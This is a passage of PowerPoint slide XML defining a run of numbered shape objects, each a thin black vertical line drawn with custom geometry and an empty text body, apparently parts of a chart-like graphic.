                <a:lnTo>
                  <a:pt x="0" y="243820"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="object 373"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5826881" y="5249180"/>
            <a:ext cx="2517" cy="483206"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="243839">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="243820"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="object 374"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855060" y="5293711"/>
            <a:ext cx="0" cy="439164"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="221614">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="221344"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="object 375"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5853145" y="5292830"/>
            <a:ext cx="2517" cy="440422"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="222250">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="221793"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="object 376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5882912" y="5320523"/>
            <a:ext cx="0" cy="412736"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="208280">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="207814"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="object 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5882640" y="5322410"/>
            <a:ext cx="1258" cy="410222"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="207010">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="206866"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="object 378"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5910820" y="5353201"/>
            <a:ext cx="0" cy="380021"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="191769">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="191328"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="object 379"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5910547" y="5354830"/>
            <a:ext cx="3775" cy="377505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="190500">
                <a:moveTo>
                  <a:pt x="1374" y="190230"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1374" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="190230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="190506"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="object 380"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5938178" y="5378964"/>
            <a:ext cx="0" cy="353596"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="178435">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="178323"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="object 381"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5937605" y="5378382"/>
            <a:ext cx="1258" cy="354854"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="179069">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="178621"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="object 382"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5966030" y="5412734"/>
            <a:ext cx="0" cy="319621"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="161289">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="161286"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="object 383"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5965757" y="5411351"/>
            <a:ext cx="2517" cy="322137"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="162560">
                <a:moveTo>
                  <a:pt x="974" y="161708"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="161708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="161984"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="object 384"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5993936" y="5423459"/>
            <a:ext cx="0" cy="309554"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="156210">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="155874"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="object 385"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5992279" y="5422077"/>
            <a:ext cx="2517" cy="310812"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="156844">
                <a:moveTo>
                  <a:pt x="0" y="156296"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="156572"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="object 386"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6021844" y="5434186"/>
            <a:ext cx="0" cy="298229"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="150494">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="150461"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="object 387"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6021571" y="5432801"/>
            <a:ext cx="1258" cy="300745"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="151764">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="151160"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="object 388"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049696" y="5452408"/>
            <a:ext cx="0" cy="280612"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="141605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="141266"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="object 389"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6046955" y="5452653"/>
            <a:ext cx="2517" cy="280612"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="141605">
                <a:moveTo>
                  <a:pt x="0" y="140866"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="140866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="141142"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="object 390"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6077601" y="5454036"/>
            <a:ext cx="0" cy="279353"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="140969">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="140438"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="object 391"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6077030" y="5453457"/>
            <a:ext cx="1258" cy="279353"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="140969">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="140736"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="object 392"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6104960" y="5478166"/>
            <a:ext cx="0" cy="254186"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="128269">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="128261"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="object 393"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6104686" y="5476205"/>
            <a:ext cx="2517" cy="256701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="129539">
                <a:moveTo>
                  <a:pt x="1098" y="128981"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1098" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="128981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="129257"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="object 394"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6132814" y="5464761"/>
            <a:ext cx="0" cy="268028"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="135255">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="135026"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="object 395"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6131458" y="5464182"/>
            <a:ext cx="1258" cy="269287"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="135889">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="135324"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="object 396"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6160720" y="5479219"/>
            <a:ext cx="0" cy="254186"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="128269">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="127736"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="object 397"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6160447" y="5482233"/>
            <a:ext cx="1258" cy="250409"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="126364">
                <a:moveTo>
                  <a:pt x="546" y="125939"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="125939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="126215"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="object 398"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6188572" y="5477085"/>
            <a:ext cx="0" cy="255445"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="128905">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="128813"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="object 399"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6186122" y="5475702"/>
            <a:ext cx="2517" cy="256701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
